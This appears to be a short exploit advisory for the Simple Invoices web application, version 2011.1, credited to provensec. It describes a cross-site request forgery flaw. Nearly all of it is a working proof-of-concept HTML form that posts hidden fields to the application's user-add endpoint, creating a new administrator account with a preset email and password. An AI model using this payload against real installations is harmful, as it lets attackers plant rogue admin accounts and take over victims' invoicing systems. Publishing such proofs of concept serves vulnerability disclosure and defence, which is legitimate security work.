# Affected software: simple invoice
# Type of vulnerability:adding admin user via csrf
# URL:simpleinvoices.org
# Discovered by: provensec
# Website: provensec.com

#version:2011.1
# Proof of concept

<html>

  <body>
    <form action="
http://demo.simpleinvoices.org/index.php?module=user&view=add"
method="POST">
      <input type="hidden" name="email" value="aaaa&#64;gmail&#46;com" />
      <input type="hidden" name="role" value="1" />
      <input type="hidden" name="password&#95;field" value="lalala123&#64;"
/>
      <input type="hidden" name="enabled" value="1" />
      <input type="hidden" name="submit" value="Insert&#32;User" />
      <input type="hidden" name="op" value="insert&#95;user" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>